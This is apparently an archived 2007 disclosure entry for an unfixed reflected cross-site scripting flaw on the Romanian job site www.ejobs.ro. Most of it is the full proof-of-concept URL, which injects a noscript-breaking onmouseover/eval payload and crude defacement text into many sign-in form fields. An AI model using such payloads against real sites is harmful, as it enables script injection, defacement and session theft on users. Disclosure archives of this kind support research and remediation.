Security researcher MIster C. submitted a cross-site scripting (XSS) vulnerability on 06/09/2007 affecting www.ejobs.ro, which at the time of submission ranked 3188 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 09/09/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Date submitted: 06/09/2007
Date published: 09/09/2007
Status: UNFIXED
Author: MIster C.
Domain: www.ejobs.ro
Category: XSS
Pagerank: 3188
URL: http://www.ejobs.ro/company/signin.php?valid=true&fcusername=%22%3E%3C%2Fnoscript%3E%3Cbr%3E%3Ccode+ onmouseover%3Da%3Deval%3Bb%3Dalert%3Ba%28b%28%2Ffucked%2F.source%29%29%3B%3EFucked%2BBy%2BMIster%2BC .%2BMOVE+MOUSE+OVER+THIS+AREA%3C%2Fcode%3E&cpassword=%22%3E%3C%2Fnoscript%3E%3Cbr%3E%3Ccode+onmouseo ver%3Da%3Deval%3Bb%3Dalert%3Ba%28b%28%2Ffucked%2F.source%29%29%3B%3EFucked%2BBy%2BMIster%2BC.%2BMOVE +MOUSE+OVER+THIS+AREA%3C%2Fcode%3E&recpassword=%22%3E%3C%2Fnoscript%3E%3Cbr%3E%3Ccode+onmouseover%3D a%3Deval%3Bb%3Dalert%3Ba%28b%28%2Ffucked%2F.source%29%29%3B%3EFucked%2BBy%2BMIster%2BC.%2BMOVE+MOUSE +OVER+THIS+AREA%3C%2Fcode%3E&nume=%22%3E%3C%2Fnoscript%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb% 3Dalert%3Ba%28b%28%2Ffucked%2F.source%29%29%3B%3EFucked%2BBy%2BMIster%2BC.%2BMOVE+MOUSE+OVER+THIS+AR EA%3C%2Fcode%3E&adresa=%22%3E%3C%2Fnoscript%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert%3Ba %28b%28%2Ffucked%2F.source%29%29%3B%3EFucked%2BBy%2BMIster%2BC.%2BMOVE+MOUSE+OVER+THIS+AREA%3C%2Fcod e%3E&oras=%22%3E%3C%2Fnoscript%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert%3Ba%28b%28%2Ffuc ked%2F.source%29%29%3B%3EFucked%2BBy%2BMIster%2BC.%2BMOVE+MOUSE+OVER+THIS+AREA%3C%2Fcode%3E&tara=%22 %3E%3C%2Fnoscript%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert%3Ba%28b%28%2Ffucked%2F.source %29%29%3B%3EFucked%2BBy%2BMIster%2BC.%2BMOVE+MOUSE+OVER+THIS+AREA%3C%2Fcode%3E&telefon=%22%3E%3C%2Fn oscript%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert%3Ba%28b%28%2Ffucked%2F.source%29%29%3B% 3EFucked%2BBy%2BMIster%2BC.%2BMOVE+MOUSE+OVER+THIS+AREA%3C%2Fcode%3E&cod_fiscal=%22%3E%3C%2Fnoscript %3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert%3Ba%28b%28%2Ffucked%2F.source%29%29%3B%3EFucke d%2BBy%2BMIster%2BC.%2BMOVE+MOUSE+OVER+THIS+AREA%3C%2Fcode%3E&atribut_fiscal=-&fax=&url=%22%3E%3C%2F noscript%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert%3Ba%28b%28%2Ffucked%2F.source%29%29%3B 
%3EFucked%2BBy%2BMIster%2BC.%2BMOVE+MOUSE+OVER+THIS+AREA%3C%2Fcode%3E&email=%22%3E%3C%2Fnoscript%3E% 3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert%3Ba%28b%28%2Ffucked%2F.source%29%29%3B%3EFucked%2B By%2BMIster%2BC.%2BMOVE+MOUSE+OVER+THIS+AREA%3C%2Fcode%3E&domeniu_act%5B%5D=24&oras_activ%5B%5D=263& nivel_bussines=Local&numar_angajati=%22%3E%3C%2Fnoscript%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3B b%3Dalert%3Ba%28b%28%2Ffucked%2F.source%29%29%3B%3EFucked%2BBy%2BMIster%2BC.%2BMOVE+MOUSE+OVER+THIS+ AREA%3C%2Fcode%3E&estimare_angajari=%22%3E%3C%2Fnoscript%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3B b%3Dalert%3Ba%28b%28%2Ffucked%2F.source%29%29%3B%3EFucked%2BBy%2BMIster%2BC.%2BMOVE+MOUSE+OVER+THIS+ AREA%3C%2Fcode%3E&pc_nume=%22%3E%3C%2Fnoscript%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert% 3Ba%28b%28%2Ffucked%2F.source%29%29%3B%3EFucked%2BBy%2BMIster%2BC.%2BMOVE+MOUSE+OVER+THIS+AREA%3C%2F code%3E&pc_functie=%22%3E%3C%2Fnoscript%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert%3Ba%28b %28%2Ffucked%2F.source%29%29%3B%3EFucked%2BBy%2BMIster%2BC.%2BMOVE+MOUSE+OVER+THIS+AREA%3C%2Fcode%3E &pc_tel=%22%3E%3C%2Fnoscript%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert%3Ba%28b%28%2Ffucke d%2F.source%29%29%3B%3EFucked%2BBy%2BMIster%2BC.%2BMOVE+MOUSE+OVER+THIS+AREA%3C%2Fcode%3E&pc_email=% 22%3E%3C%2Fnoscript%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert%3Ba%28b%28%2Ffucked%2F.sour ce%29%29%3B%3EFucked%2BBy%2BMIster%2BC.%2BMOVE+MOUSE+OVER+THIS+AREA%3C%2Fcode%3E&newsletter_general= on&newsletter_articole=on&agree=on |